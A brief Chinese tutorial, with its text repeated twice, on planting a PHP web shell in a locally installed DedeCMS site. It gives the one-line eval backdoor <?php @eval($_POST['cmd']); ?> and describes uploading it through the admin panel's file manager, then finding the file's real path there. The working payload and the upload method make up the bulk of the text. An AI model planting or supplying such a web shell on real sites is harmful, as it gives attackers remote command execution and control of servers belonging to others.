準備工作
1.織夢CMS
2.lamp/xamp/wamp環境
3.在本地服務器部署織夢CMS
4.訪問織夢CMS後臺
127.0.0.1/*/dede/
5.準備一句話木馬文件
新建一個.PHP文件,寫入如下語句。
<?php @eval($_POST['cmd']); ?>
方法一
利用織夢後臺文件可直接上傳的機制。
即附件管理-文件式管理器-文件上傳功能
完成一句話木馬的上傳。且文件真實路徑可在文件管理器中查到。
1.織夢CMS
2.lamp/xamp/wamp環境
3.在本地服務器部署織夢CMS
4.訪問織夢CMS後臺
127.0.0.1/*/dede/
5.準備一句話木馬文件
新建一個.PHP文件,寫入如下語句。
<?php @eval($_POST['cmd']); ?>
利用織夢後臺文件可直接上傳的機制。
即附件管理-文件式管理器-文件上傳功能
完成一句話木馬的上傳。且文件真實路徑可在文件管理器中查到。